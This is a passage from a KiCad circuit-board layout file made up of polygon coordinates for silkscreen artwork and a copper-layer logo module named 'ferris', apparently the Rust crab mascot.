(xy -0.197201 -8.675757) (xy 0.137739 -8.67032) (xy 0.28575 -8.669741) (xy 0.650556 -8.670962)) (layer B.SilkS) (width 0.01))
(fp_poly (pts (xy -10.015769 -8.101232) (xy -9.79982 -8.114631) (xy -9.628334 -8.148034) (xy -9.460075 -8.209376)
(xy -9.260386 -8.303356) (xy -8.79599 -8.599765) (xy -8.380484 -9.000088) (xy -8.027479 -9.48624)
(xy -7.750588 -10.040134) (xy -7.593396 -10.518415) (xy -7.531979 -10.869932) (xy -7.500959 -11.297691)
(xy -7.50037 -11.75462) (xy -7.530248 -12.193643) (xy -7.590627 -12.567687) (xy -7.591868 -12.573)
(xy -7.739406 -13.044242) (xy -7.952704 -13.512538) (xy -8.215343 -13.953645) (xy -8.5109 -14.343322)
(xy -8.822953 -14.657325) (xy -9.135081 -14.871414) (xy -9.155758 -14.88167) (xy -9.486298 -14.996412)
(xy -9.885397 -15.067603) (xy -10.300415 -15.089623) (xy -10.678707 -15.056851) (xy -10.720306 -15.048723)
(xy -11.240834 -14.876876) (xy -11.726225 -14.59593) (xy -12.154943 -14.223059) (xy -12.505452 -13.775433)
(xy -12.656416 -13.504992) (xy -12.832824 -13.101273) (xy -12.949948 -12.72343) (xy -13.016968 -12.32759)
(xy -13.043062 -11.869877) (xy -13.044051 -11.65225) (xy -13.001362 -10.991701) (xy -12.947215 -10.69424)
(xy -11.149436 -10.69424) (xy -11.148014 -10.702019) (xy -11.034665 -10.98357) (xy -10.82139 -11.237152)
(xy -10.534225 -11.451001) (xy -10.199205 -11.61335) (xy -9.842365 -11.712436) (xy -9.489743 -11.736493)
(xy -9.167373 -11.673757) (xy -9.0805 -11.636276) (xy -8.891465 -11.488885) (xy -8.770791 -11.263033)
(xy -8.714362 -10.946621) (xy -8.715719 -10.563976) (xy -8.765436 -10.183729) (xy -8.870477 -9.899777)
(xy -9.043474 -9.688803) (xy -9.270033 -9.540875) (xy -9.642731 -9.418085) (xy -10.021997 -9.41916)
(xy -10.396617 -9.542215) (xy -10.755376 -9.785365) (xy -10.762578 -9.791673) (xy -11.013036 -10.076175)
(xy -11.143062 -10.379566) (xy -11.149436 -10.69424) (xy -12.947215 -10.69424) (xy -12.886738 -10.362013)
(xy -12.707047 -9.783277) (xy -12.469154 -9.275581) (xy -12.179927 -8.859015) (xy -12.038383 -8.70997)
(xy -11.707749 -8.442692) (xy -11.357599 -8.25944) (xy -10.958406 -8.149746) (xy -10.480642 -8.103143)
(xy -10.317415 -8.099899) (xy -10.015769 -8.101232)) (layer B.SilkS) (width 0.01))
)
(module copper_pads:ferris locked (layer F.Cu) (tedit 5F81BAD1) (tstamp 5EDC1554)
(at 188 83 10)
(attr virtual)
(fp_text reference G*** (at 0 0 10) (layer F.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)))
)
(fp_text value LOGO (at 0.75 0 10) (layer F.SilkS) hide
(effects (font (size 1.524 1.524) (thickness 0.3)))
)
(fp_poly (pts (xy 0.204806 -6.667386) (xy 0.251355 -6.666904) (xy 0.286186 -6.66584) (xy 0.311907 -6.66398)
(xy 0.331126 -6.661112) (xy 0.346451 -6.657021) (xy 0.360488 -6.651495) (xy 0.365103 -6.649403)
(xy 0.380736 -6.642173) (xy 0.394728 -6.635246) (xy 0.407772 -6.627619) (xy 0.420563 -6.618292)
(xy 0.433795 -6.606263) (xy 0.448162 -6.590531) (xy 0.46436 -6.570093) (xy 0.483081 -6.543948)
(xy 0.505021 -6.511095) (xy 0.530874 -6.470532) (xy 0.561335 -6.421257) (xy 0.597097 -6.362268)
(xy 0.638856 -6.292565) (xy 0.687305 -6.211146) (xy 0.743139 -6.117008) (xy 0.795725 -6.028266)
(xy 0.841799 -5.950535) (xy 0.880048 -5.886112) (xy 0.91127 -5.833733) (xy 0.936266 -5.792136)
(xy 0.955837 -5.760058) (xy 0.970783 -5.736234) (xy 0.981904 -5.719404) (xy 0.99 -5.708302)
(xy 0.995873 -5.701666) (xy 1.000322 -5.698234) (xy 1.004147 -5.696741) (xy 1.006054 -5.696332)
(xy 1.010852 -5.696228) (xy 1.016812 -5.698554) (xy 1.025185 -5.704586) (xy 1.037223 -5.715601)
(xy 1.054178 -5.732876) (xy 1.077301 -5.757686) (xy 1.107843 -5.79131) (xy 1.147056 -5.835023)
(xy 1.196191 -5.890102) (xy 1.198033 -5.892169) (xy 1.283248 -5.987764) (xy 1.358037 -6.071503)
(xy 1.423184 -6.144217) (xy 1.479477 -6.20674) (xy 1.527703 -6.259902) (xy 1.568648 -6.304536)
(xy 1.603099 -6.341474) (xy 1.631841 -6.371547) (xy 1.655663 -6.395588) (xy 1.67535 -6.414428)
(xy 1.69169 -6.4289) (xy 1.705468 -6.439835) (xy 1.717472 -6.448065) (xy 1.728488 -6.454423)
(xy 1.730786 -6.455616) (xy 1.748421 -6.46443) (xy 1.763829 -6.470987) (xy 1.779909 -6.475668)
(xy 1.799557 -6.478856) (xy 1.82567 -6.48093) (xy 1.861144 -6.482272) (xy 1.908876 -6.483263)
(xy 1.945448 -6.483861) (xy 2.014182 -6.484446) (xy 2.068816 -6.483413) (xy 2.112148 -6.480254)
(xy 2.146974 -6.474463) (xy 2.176093 -6.465532) (xy 2.202301 -6.452956) (xy 2.228396 -6.436226)
(xy 2.235199 -6.431358) (xy 2.24853 -6.42177) (xy 2.260247 -6.413038) (xy 2.270849 -6.404024)
(xy 2.280834 -6.39359) (xy 2.2907 -6.380596) (xy 2.300947 -6.363905) (xy 2.312073 -6.342377)
(xy 2.324576 -6.314874) (xy 2.338955 -6.280257) (xy 2.355709 -6.237389) (xy 2.375335 -6.18513)
(xy 2.398332 -6.122341) (xy 2.4252 -6.047884) (xy 2.456436 -5.960621) (xy 2.492538 -5.859413)
(xy 2.522897 -5.774266) (xy 2.550552 -5.697086) (xy 2.576768 -5.62462) (xy 2.600948 -5.558467)
(xy 2.622498 -5.500223) (xy 2.640821 -5.451485) (xy 2.655323 -5.413851) (xy 2.665407 -5.388918)
(xy 2.670478 -5.378283) (xy 2.67058 -5.378166) (xy 2.68554 -5.369523) (xy 2.708381 -5.362871)
(xy 2.711138 -5.362387) (xy 2.718249 -5.361652) (xy 2.725938 -5.362318) (xy 2.735368 -5.365177)
(xy 2.7477 -5.371025) (xy 2.764099 -5.380654) (xy 2.785726 -5.394858) (xy 2.813745 -5.414431)
(xy 2.849317 -5.440167) (xy 2.893607 -5.47286) (xy 2.947777 -5.513303) (xy 3.012989 -5.56229)
(xy 3.090406 -5.620615) (xy 3.100019 -5.627862) (xy 3.189504 -5.695018) (xy 3.268927 -5.753971)
(xy 3.337777 -5.804356) (xy 3.395541 -5.845808) (xy 3.441706 -5.877959) (xy 3.475763 -5.900444)
(xy 3.497197 -5.912897) (xy 3.500967 -5.914575) (xy 3.517784 -5.920301) (xy 3.536154 -5.924535)
(xy 3.558876 -5.927492) (xy 3.588751 -5.929387) (xy 3.628577 -5.930437) (xy 3.681154 -5.930858)
(xy 3.712633 -5.9309) (xy 3.77051 -5.930819) (xy 3.814276 -5.930388) (xy 3.846755 -5.929317)
(xy 3.870769 -5.92732) (xy 3.88914 -5.924108) (xy 3.904691 -5.919396) (xy 3.920246 -5.912894)
(xy 3.928919 -5.908877) (xy 3.983792 -5.877242) (xy 4.026187 -5.838388) (xy 4.06022 -5.788468)
(xy 4.062743 -5.783808) (xy 4.068513 -5.772454) (xy 4.073792 -5.760365) (xy 4.078846 -5.746141)
(xy 4.083941 -5.728383) (xy 4.089345 -5.705692) (xy 4.095322 -5.67667) (xy 4.10214 -5.639919)
(xy 4.110063 -5.594038) (xy 4.11936 -5.537629) (xy 4.130295 -5.469293) (xy 4.143135 -5.387631)
(xy 4.158146 -5.291246) (xy 4.165515 -5.24376) (xy 4.179457 -5.15424) (xy 4.192792 -5.069343)
(xy 4.205269 -4.990613) (xy 4.21664 -4.919593) (xy 4.226653 -4.857827) (xy 4.235059 -4.806858)
(xy 4.241609 -4.768229) (xy 4.246051 -4.743484) (xy 4.247983 -4.734524) (xy 4.259706 -4.71885)
(xy 4.283759 -4.700056) (xy 4.3053 -4.687014) (xy 4.3561 -4.659014) (xy 4.736079 -4.840077)
(xy 4.812039 -4.876102) (xy 4.884338 -4.910066) (xy 4.951347 -4.941225) (xy 5.011438 -4.968837)
(xy 5.062979 -4.992159) (xy 5.104343 -5.010448) (xy 5.133898 -5.022961) (xy 5.150017 -5.028956)
(xy 5.150946 -5.029196) (xy 5.180633 -5.033496) (xy 5.222868 -5.036275) (xy 5.273384 -5.037589)
(xy 5.327916 -5.037494) (xy 5.382197 -5.036044) (xy 5.43196 -5.033295) (xy 5.47294 -5.029303)
(xy 5.498817 -5.024684) (xy 5.561443 -4.99995) (xy 5.615367 -4.961549) (xy 5.65852 -4.911386)
(xy 5.688829 -4.851365) (xy 5.689596 -4.849212) (xy 5.694604 -4.833738) (xy 5.69851 -4.817692)
(xy 5.701442 -4.798829) (xy 5.703528 -4.774904) (xy 5.704894 -4.743671) (xy 5.705667 -4.702886)
(xy 5.705975 -4.650303) (xy 5.705944 -4.583678) (xy 5.705891 -4.561628) (xy 5.705349 -4.489434)
(xy 5.704139 -4.405155) (xy 5.702367 -4.31362) (xy 5.700138 -4.21966) (xy 5.697557 -4.128104)
(xy 5.69473 -4.043783) (xy 5.694379 -4.034366) (xy 5.683509 -3.7465) (xy 5.709837 -3.722495)
(xy 5.732271 -3.702604) (xy 5.759533 -3.679173) (xy 5.772809 -3.668019) (xy 5.809451 -3.637546)
(xy 6.587977 -3.828216) (xy 6.750505 -3.825458) (xy 6.807091 -3.824409) (xy 6.849669 -3.823209)
(xy 6.881164 -3.821495) (xy 6.904499 -3.818899) (xy 6.922599 -3.815057) (xy 6.938388 -3.809603)
(xy 6.95479 -3.802173) (xy 6.960959 -3.799164) (xy 7.016623 -3.762511) (xy 7.062612 -3.712244)
(xy 7.093922 -3.658616) (xy 7.101551 -3.64164) (xy 7.107255 -3.625922) (xy 7.111357 -3.608618)
(xy 7.114181 -3.586887) (xy 7.116049 -3.557884) (xy 7.117283 -3.518767) (xy 7.118208 -3.466693)
(xy 7.118562 -3.4417) (xy 7.120891 -3.272366) (xy 7.028676 -2.866215) (xy 6.93646 -2.460063)
(xy 6.983214 -2.400548) (xy 7.004633 -2.373337) (xy 7.022155 -2.351175) (xy 7.033089 -2.337465)
(xy 7.035102 -2.335005) (xy 7.044444 -2.333956) (xy 7.068801 -2.333604) (xy 7.106272 -2.333912)
(xy 7.154954 -2.334843) (xy 7.212945 -2.33636) (xy 7.278343 -2.338427) (xy 7.349246 -2.341006)
(xy 7.353401 -2.341167) (xy 7.435265 -2.344135) (xy 7.521061 -2.346853) (xy 7.607047 -2.34923)
(xy 7.68948 -2.351174) (xy 7.764615 -2.352594) (xy 7.82871 -2.353398) (xy 7.858865 -2.353545)
(xy 7.922251 -2.353477) (xy 7.971308 -2.353008) (xy 8.008638 -2.351952) (xy 8.036844 -2.350124)
(xy 8.058529 -2.347337) (xy 8.076295 -2.343406) (xy 8.092746 -2.338144) (xy 8.097177 -2.336517)
(xy 8.154973 -2.306019) (xy 8.20419 -2.261549) (xy 8.243318 -2.204524) (xy 8.248338 -2.194742)
(xy 8.276166 -2.138242) (xy 8.279083 -1.983979) (xy 8.279622 -1.921755) (xy 8.27884 -1.867113)
(xy 8.276831 -1.822881) (xy 8.273688 -1.79189) (xy 8.272558 -1.785693) (xy 8.267361 -1.769388)
(xy 8.25602 -1.73926) (xy 8.239226 -1.696977) (xy 8.217669 -1.644209) (xy 8.192039 -1.582627)
(xy 8.163027 -1.513898) (xy 8.131322 -1.439693) (xy 8.097616 -1.361681) (xy 8.090009 -1.344194)
(xy 7.916901 -0.946716) (xy 7.946357 -0.888224) (xy 7.9609 -0.860551) (xy 7.972885 -0.839946)
(xy 7.980139 -0.830092) (xy 7.980881 -0.829733) (xy 7.989932 -0.828354) (xy 8.014175 -0.824385)
(xy 8.052107 -0.818079) (xy 8.102226 -0.809687) (xy 8.16303 -0.799463) (xy 8.233018 -0.787659)
(xy 8.310688 -0.774528) (xy 8.394537 -0.760321) (xy 8.461258 -0.748996) (xy 8.568881 -0.73068)
(xy 8.661165 -0.714806) (xy 8.739472 -0.700997) (xy 8.80516 -0.68888) (xy 8.85959 -0.678081)
(xy 8.904121 -0.668224) (xy 8.940113 -0.658936) (xy 8.968926 -0.649842) (xy 8.991919 -0.640567)
(xy 9.010453 -0.630737) (xy 9.025888 -0.619978) (xy 9.039582 -0.607915) (xy 9.052896 -0.594173)
(xy 9.06271 -0.583364) (xy 9.08955 -0.549961) (xy 9.109594 -0.515531) (xy 9.123881 -0.476689)
(xy 9.13345 -0.430048) (xy 9.139341 -0.372221) (xy 9.141732 -0.325966) (xy 9.142762 -0.238851)
(xy 9.138891 -0.162847) (xy 9.130287 -0.099471) (xy 9.117117 -0.050243) (xy 9.109453 -0.032533)
(xy 9.098274 -0.013144) (xy 9.079542 0.016632) (xy 9.055484 0.05336) (xy 9.028329 0.093606)
(xy 9.015511 0.112213) (xy 8.989891 0.149744) (xy 8.968485 0.182257) (xy 8.952837 0.207312)
(xy 8.944492 0.222465) (xy 8.943641 0.225798) (xy 8.950535 0.221273) (xy 8.967658 0.206358)
(xy 8.993289 0.182661) (xy 9.025707 0.15179) (xy 9.063192 0.115352) (xy 9.087223 0.09166)
(xy 9.226716 -0.046566) (xy 9.292122 -0.194387) (xy 9.315654 -0.248284) (xy 9.33255 -0.288894)
(xy 9.343494 -0.318197) (xy 9.349174 -0.338173) (xy 9.350276 -0.350802) (xy 9.34841 -0.356807)
(xy 9.339344 -0.369451) (xy 9.322383 -0.391572) (xy 9.300342 -0.419534) (xy 9.285854 -0.437598)
(xy 9.162113 -0.602315) (xy 9.051345 -0.773467) (xy 8.954226 -0.949623) (xy 8.871432 -1.129355)
(xy 8.803639 -1.311232) (xy 8.751524 -1.493825) (xy 8.72397 -1.625599) (xy 8.718539 -1.66664)
(xy 8.713945 -1.721585) (xy 8.710223 -1.787424) (xy 8.707409 -1.861147) (xy 8.705536 -1.939745)
(xy 8.704641 -2.020207) (xy 8.704758 -2.099523) (xy 8.705922 -2.174684) (xy 8.708168 -2.242679)
(xy 8.711532 -2.300498) (xy 8.71563 -2.342006) (xy 8.745931 -2.509132) (xy 8.792721 -2.672486)
(xy 8.85597 -2.832027) (xy 8.935649 -2.987715) (xy 9.03173 -3.139509) (xy 9.144183 -3.287368)
(xy 9.27298 -3.431251) (xy 9.418092 -3.571118) (xy 9.57949 -3.706929) (xy 9.757145 -3.838641)
(xy 9.800166 -3.868259) (xy 9.925374 -3.949835) (xy 10.062688 -4.033047) (xy 10.207777 -4.115468)
(xy 10.356309 -4.19467) (xy 10.503953 -4.268222) (xy 10.564199 -4.296634) (xy 10.701698 -4.360333)
(xy 10.930466 -4.360333) (xy 10.930466 -4.247617) (xy 10.930201 -4.20052) (xy 10.929056 -4.166455)
(xy 10.926505 -4.141527) (xy 10.922026 -4.12184) (xy 10.915092 -4.103496) (xy 10.909411 -4.091257)
(xy 10.892359 -4.050587) (xy 10.873607 -3.996671) (xy 10.854163 -3.932978) (xy 10.835034 -3.862977)
(xy 10.817226 -3.790138) (xy 10.803302 -3.725719) (xy 10.783162 -3.618877) (xy 10.765283 -3.508801)
(xy 10.749328 -3.392804) (xy 10.734962 -3.268198) (xy 10.721849 -3.132295) (xy 10.709653 -2.982407)
(xy 10.708546 -2.967566) (xy 10.706609 -2.933716) (xy 10.704831 -2.8878) (xy 10.703222 -2.831658)
(xy 10.701792 -2.767129) (xy 10.700551 -2.696054) (xy 10.699508 -2.620272) (xy 10.698673 -2.541623)
(xy 10.698056 -2.461947) (xy 10.697666 -2.383084) (xy 10.697513 -2.306874) (xy 10.697608 -2.235157)
(xy 10.697959 -2.169773) (xy 10.698576 -2.112562) (xy 10.69947 -2.065363) (xy 10.700649 -2.030016)
(xy 10.702124 -2.008362) (xy 10.703448 -2.002194) (xy 10.713978 -2.00309) (xy 10.735051 -2.01412)
(xy 10.764869 -2.033824) (xy 10.801632 -2.060745) (xy 10.843541 -2.093422) (xy 10.888797 -2.130398)
(xy 10.935601 -2.170212) (xy 10.982153 -2.211407) (xy 11.026654 -2.252523) (xy 11.067306 -2.292101)
(xy 11.090768 -2.316265) (xy 11.224437 -2.469856) (xy 11.347126 -2.636093) (xy 11.458862 -2.815031)
(xy 11.559672 -3.006729) (xy 11.649583 -3.211244) (xy 11.728623 -3.428633) (xy 11.796819 -3.658952)
(xy 11.854198 -3.90226) (xy 11.861721 -3.939116) (xy 11.871467 -3.9878) (xy 12.103371 -3.9878)
(xy 12.129583 -3.947583) (xy 12.206152 -3.818081) (xy 12.275609 -3.676318) (xy 12.336364 -3.526042)
(xy 12.38683 -3.370996) (xy 12.408358 -3.290221) (xy 12.422175 -3.23309) (xy 12.433652 -3.182513)
(xy 12.443002 -3.136117) (xy 12.45044 -3.091529) (xy 12.456181 -3.046376) (xy 12.46044 -2.998285)
(xy 12.46343 -2.944883) (xy 12.465367 -2.883797) (xy 12.466466 -2.812653) (xy 12.46694 -2.729079)
(xy 12.46701 -2.641599) (xy 12.466914 -2.554821) (xy 12.466655 -2.482913) (xy 12.466144 -2.423812)
(xy 12.465294 -2.375457) (xy 12.464018 -2.335784) (xy 12.462227 -2.30273) (xy 12.459833 -2.274233)
(xy 12.45675 -2.24823) (xy 12.452889 -2.222659) (xy 12.448162 -2.195456) (xy 12.448 -2.194556)
(xy 12.407566 -2.007735) (xy 12.35504 -1.829187) (xy 12.289423 -1.656456) (xy 12.20972 -1.487086)
(xy 12.114933 -1.318623) (xy 12.051885 -1.219199) (xy 11.932347 -1.05094) (xy 11.796563 -0.883605)
(xy 11.645216 -0.717813) (xy 11.478989 -0.554182) (xy 11.298567 -0.393331) (xy 11.104632 -0.235876)
(xy 10.89787 -0.082437) (xy 10.678962 0.066369) (xy 10.5156 0.169446) (xy 10.457932 0.205877)
(xy 10.415527 0.235296) (xy 10.388274 0.257783) (xy 10.377531 0.270447) (xy 10.362535 0.293901)
(xy 10.33909 0.328188) (xy 10.309081 0.370725) (xy 10.274393 0.418928) (xy 10.236908 0.470213)
(xy 10.19851 0.521998) (xy 10.161084 0.571699) (xy 10.126513 0.616732) (xy 10.105517 0.643471)
(xy 9.986027 0.790227) (xy 9.868821 0.926521) (xy 9.749376 1.057393) (xy 9.623172 1.187886)
(xy 9.568236 1.242636) (xy 9.526845 1.284148) (xy 9.492561 1.319872) (xy 9.466634 1.348423)
(xy 9.450315 1.368413) (xy 9.444854 1.378457) (xy 9.445141 1.379122) (xy 9.453222 1.38531)
(xy 9.473743 1.400615) (xy 9.505488 1.424141) (xy 9.547241 1.454989) (xy 9.597787 1.492265)
(xy 9.65591 1.535071) (xy 9.720394 1.582511) (xy 9.790024 1.633688) (xy 9.859433 1.684659)
(xy 9.933866 1.739461) (xy 10.005062 1.792197) (xy 10.071692 1.84186) (xy 10.132428 1.887448)
(xy 10.185943 1.927954) (xy 10.230909 1.962376) (xy 10.265998 1.989707) (xy 10.289881 2.008945)
(xy 10.300504 2.018307) (xy 10.321757 2.041771) (xy 10.338384 2.065389) (xy 10.350931 2.091605)
(xy 10.359947 2.12286) (xy 10.36598 2.161597) (xy 10.369577 2.21026) (xy 10.371287 2.27129)
(xy 10.371666 2.335524) (xy 10.371459 2.399689) (xy 10.370697 2.449955) (xy 10.369175 2.489354)
(xy 10.366683 2.520917) (xy 10.363014 2.547674) (xy 10.357961 2.572657) (xy 10.354427 2.587089)
(xy 10.339772 2.632883) (xy 10.317041 2.689378) (xy 10.287798 2.753354) (xy 10.253602 2.821587)
(xy 10.216015 2.890855) (xy 10.176598 2.957937) (xy 10.168012 2.971801) (xy 10.107747 3.06674)
(xy 10.037313 3.175146) (xy 9.956744 3.296969) (xy 9.866072 3.432161) (xy 9.765333 3.580673)
(xy 9.654559 3.742456) (xy 9.533784 3.917463) (xy 9.403042 4.105643) (xy 9.262366 4.30695)
(xy 9.11179 4.521334) (xy 8.951347 4.748746) (xy 8.781072 4.989139) (xy 8.600997 5.242462)
(xy 8.475404 5.418667) (xy 8.419332 5.497647) (xy 8.363813 5.576588) (xy 8.310073 5.6537)
(xy 8.259337 5.72719) (xy 8.212831 5.79527) (xy 8.171782 5.856147) (xy 8.137414 5.908032)
(xy 8.110953 5.949133) (xy 8.098705 5.969) (xy 8.042496 6.061946) (xy 7.988316 6.149884)
(xy 7.937033 6.231486) (xy 7.889515 6.305425) (xy 7.846629 6.370373) (xy 7.809243 6.425002)
(xy 7.778225 6.467986) (xy 7.754443 6.497996) (xy 7.74862 6.504517) (xy 7.726898 6.5278)
(xy 7.4853 6.5278) (xy 7.479548 6.497141) (xy 7.476716 6.469537) (xy 7.475522 6.428377)
(xy 7.475812 6.376946) (xy 7.477433 6.318525) (xy 7.480233 6.256399) (xy 7.484059 6.193849)
(xy 7.488756 6.134161) (xy 7.494173 6.080615) (xy 7.500157 6.036497) (xy 7.501349 6.029428)
(xy 7.520767 5.931301) (xy 7.546117 5.82277) (xy 7.576136 5.708757) (xy 7.609559 5.594185)
(xy 7.628853 5.532967) (xy 7.668004 5.415563) (xy 7.706967 5.306155) (xy 7.747297 5.200965)
(xy 7.790548 5.096216) (xy 7.838274 4.988132) (xy 7.892031 4.872936) (xy 7.947736 4.758267)
(xy 8.04181 4.560548) (xy 8.136178 4.348632) (xy 8.229758 4.125199) (xy 8.321471 3.892928)
(xy 8.410237 3.654501) (xy 8.494974 3.412596) (xy 8.518693 3.342018) (xy 8.539734 3.277358)
(xy 8.561137 3.208968) (xy 8.58233 3.138924) (xy 8.602738 3.069303) (xy 8.621788 3.002184)
(xy 8.638906 2.939643) (xy 8.65352 2.883757) (xy 8.665056 2.836604) (xy 8.672941 2.80026)
(xy 8.6766 2.776804) (xy 8.676582 2.770026) (xy 8.671477 2.770312) (xy 8.660131 2.782925)
(xy 8.644627 2.805444) (xy 8.640817 2.811567) (xy 8.594892 2.885308) (xy 8.539203 2.972387)
(xy 8.473974 3.072472) (xy 8.399433 3.185228) (xy 8.315806 3.310323) (xy 8.223316 3.447423)
(xy 8.122192 3.596194) (xy 8.012658 3.756304) (xy 7.894941 3.927418) (xy 7.769266 4.109203)
(xy 7.635859 4.301326) (xy 7.494947 4.503453) (xy 7.488464 4.512734) (xy 7.438825 4.584247)
(xy 7.388918 4.656985) (xy 7.340298 4.728625) (xy 7.294519 4.796843) (xy 7.253139 4.859314)
(xy 7.217711 4.913714) (xy 7.189791 4.957719) (xy 7.179693 4.974167) (xy 7.138164 5.042201)
(xy 7.097766 5.107081) (xy 7.059695 5.166979) (xy 7.025146 5.220064) (xy 6.995313 5.264507)
(xy 6.971391 5.298477) (xy 6.954575 5.320146) (xy 6.95163 5.323417) (xy 6.943319 5.331098)
(xy 6.933461 5.336383) (xy 6.918952 5.339718) (xy 6.896692 5.341547) (xy 6.863575 5.342315)
(xy 6.818777 5.342467) (xy 6.704013 5.342467) (xy 6.707574 5.183717) (xy 6.709092 5.125473)
(xy 6.710992 5.080179) (xy 6.713739 5.04385) (xy 6.717795 5.012504) (xy 6.723626 4.982155)
(xy 6.731695 4.948821) (xy 6.737471 4.926965) (xy 6.781683 4.774004) (xy 6.832395 4.620727)
(xy 6.890557 4.464733) (xy 6.957117 4.303623) (xy 7.033025 4.134997) (xy 7.119229 3.956453)
(xy 7.128952 3.936962) (xy 7.197567 3.798014) (xy 7.261842 3.663899) (xy 7.323443 3.530913)
(xy 7.384037 3.39535) (xy 7.445288 3.253504) (xy 7.508864 3.101672) (xy 7.5531 2.993714)
(xy 7.5742 2.941537) (xy 7.592843 2.894865) (xy 7.608175 2.855884) (xy 7.619342 2.82678)
(xy 7.62549 2.80974) (xy 7.626391 2.80617) (xy 7.618695 2.809353) (xy 7.599481 2.819535)
(xy 7.571785 2.835057) (xy 7.5438 2.851237) (xy 7.514147 2.867976) (xy 7.472369 2.890685)
(xy 7.421485 2.917767) (xy 7.364517 2.947627) (xy 7.304488 2.978665) (xy 7.2517 3.005602)
(xy 6.96083 3.145561) (xy 6.655264 3.278176) (xy 6.335637 3.40329) (xy 6.002583 3.52075)
(xy 5.656738 3.630399) (xy 5.298736 3.732084) (xy 4.929211 3.825649) (xy 4.5488 3.910938)
(xy 4.158136 3.987798) (xy 3.757855 4.056072) (xy 3.348591 4.115606) (xy 2.93098 4.166244)
(xy 2.505656 4.207833) (xy 2.243666 4.228621) (xy 2.117599 4.237515) (xy 1.999019 4.245329)
(xy 1.885672 4.252143) (xy 1.775305 4.258037) (xy 1.665665 4.263092) (xy 1.554498 4.267387)
(xy 1.439551 4.271002) (xy 1.318571 4.274018) (xy 1.189304 4.276516) (xy 1.049498 4.278574)
(xy 0.896897 4.280273) (xy 0.757766 4.281478) (xy 0.404027 4.282662) (xy 0.064641 4.280536)
(xy -0.262666 4.274992) (xy -0.58017 4.265922) (xy -0.890144 4.253218) (xy -1.194863 4.236771)
(xy -1.496602 4.216475) (xy -1.797636 4.192221) (xy -2.100239 4.163901) (xy -2.406686 4.131408)
(xy -2.408767 4.131175) (xy -2.794274 4.084137) (xy -3.17472 4.030081) (xy -3.549081 3.96925)
(xy -3.91633 3.901892) (xy -4.275444 3.828252) (xy -4.625397 3.748576) (xy -4.965165 3.66311)
(xy -5.293723 3.5721) (xy -5.610046 3.475792) (xy -5.913109 3.374431) (xy -6.201888 3.268263)
(xy -6.475357 3.157535) (xy -6.486445 3.152809) (xy -6.535801 3.131833) (xy -6.579843 3.113317)
(xy -6.616217 3.098236) (xy -6.64257 3.087562) (xy -6.656545 3.082269) (xy -6.658075 3.081867)
(xy -6.656009 3.089065) (xy -6.647048 3.10942) (xy -6.632123 3.141075) (xy -6.61217 3.182175)
(xy -6.588122 3.230862) (xy -6.560914 3.28528) (xy -6.531478 3.343572) (xy -6.50075 3.403882)
(xy -6.469662 3.464352) (xy -6.43915 3.523126) (xy -6.410146 3.578348) (xy -6.383585 3.62816)
(xy -6.379122 3.636434) (xy -6.348612 3.691787) (xy -6.312648 3.755316) (xy -6.274775 3.820855)
(xy -6.238542 3.882239) (xy -6.220836 3.911601) (xy -6.133694 4.060848) (xy -6.050312 4.215672)
(xy -5.972179 4.372888) (xy -5.900779 4.529309) (xy -5.837597 4.68175) (xy -5.78412 4.827024)
(xy -5.760863 4.897967) (xy -5.749526 4.934835) (xy -5.74119 4.964779) (xy -5.735315 4.991702)
(xy -5.731361 5.019511) (xy -5.728789 5.052111) (xy -5.72706 5.093408) (xy -5.725633 5.147305)
(xy -5.725474 5.154084) (xy -5.721852 5.308601) (xy -5.841597 5.308601) (xy -5.888795 5.308515)
(xy -5.922135 5.307923) (xy -5.944689 5.306319) (xy -5.959533 5.303196) (xy -5.969742 5.298049)
(xy -5.978389 5.290374) (xy -5.983193 5.285317) (xy -6.01058 5.254314) (xy -6.044403 5.212706)
(xy -6.085295 5.159668) (xy -6.133888 5.094374) (xy -6.190814 5.015998) (xy -6.214221 4.983369)
(xy -6.246179 4.939803) (xy -6.287091 4.885777) (xy -6.334999 4.823778) (xy -6.387948 4.756296)
(xy -6.443982 4.685821) (xy -6.501142 4.61484) (xy -6.557473 4.545843) (xy -6.572321 4.527835)
(xy -6.730279 4.336326) (xy -6.88017 4.153842) (xy -7.021772 3.980665) (xy -7.154859 3.817078)
(xy -7.279209 3.663363) (xy -7.394597 3.519802) (xy -7.500799 3.386677) (xy -7.597591 3.264272)
(xy -7.68475 3.152869) (xy -7.762051 3.05275) (xy -7.803511 2.998131) (xy 0.086758 2.998131)
(xy 0.0955 3.012284) (xy 0.114267 3.034887) (xy 0.144086 3.067577) (xy 0.146042 3.069672)
(xy 0.242493 3.162098) (xy 0.34518 3.239747) (xy 0.453248 3.302079) (xy 0.565841 3.348556)
(xy 0.609599 3.361937) (xy 0.643853 3.370944) (xy 0.670097 3.375649) (xy 0.693804 3.375889)
(xy 0.720445 3.371499) (xy 0.755493 3.362315) (xy 0.773978 3.357006) (xy 0.88447 3.316295)
(xy 0.991499 3.259399) (xy 1.09416 3.186874) (xy 1.185925 3.104885) (xy 1.210537 3.079002)
(xy 1.238025 3.047742) (xy 1.266407 3.013663) (xy 1.2937 2.979326) (xy 1.317924 2.947287)
(xy 1.337097 2.920106) (xy 1.349237 2.900341) (xy 1.352361 2.89055) (xy 1.352161 2.890273)
(xy 1.343561 2.890564) (xy 1.319407 2.892132) (xy 1.28102 2.894877) (xy 1.229723 2.898695)
(xy 1.166839 2.903487) (xy 1.09369 2.909149) (xy 1.011598 2.915582) (xy 0.921886 2.922682)
(xy 0.825876 2.930348) (xy 0.727843 2.93824) (xy 0.626724 2.946403) (xy 0.530427 2.954158)
(xy 0.440299 2.961397) (xy 0.357686 2.968013) (xy 0.283933 2.973899) (xy 0.220387 2.978947)
(xy 0.168393 2.983051) (xy 0.129298 2.986103) (xy 0.104448 2.987997) (xy 0.09525 2.988624)
(xy 0.087017 2.990789) (xy 0.086758 2.998131) (xy -7.803511 2.998131) (xy -7.829271 2.964197)
(xy -7.886185 2.887493) (xy -7.93257 2.82292) (xy -7.968201 2.770761) (xy -7.979787 2.752813)
(xy -8.029832 2.673525) (xy -8.049474 2.697779) (xy -8.057981 2.709055) (xy -8.063078 2.719853)
(xy -8.064291 2.73287) (xy -8.061143 2.750806) (xy -8.053158 2.776357) (xy -8.039862 2.812223)
(xy -8.020778 2.861101) (xy -8.020609 2.861531) (xy -7.982885 2.951665) (xy -7.936125 3.05376)
(xy -7.881313 3.166127) (xy -7.819435 3.287078) (xy -7.751476 3.414923) (xy -7.678422 3.547975)
(xy -7.601258 3.684545) (xy -7.52097 3.822944) (xy -7.438542 3.961484) (xy -7.35496 4.098476)
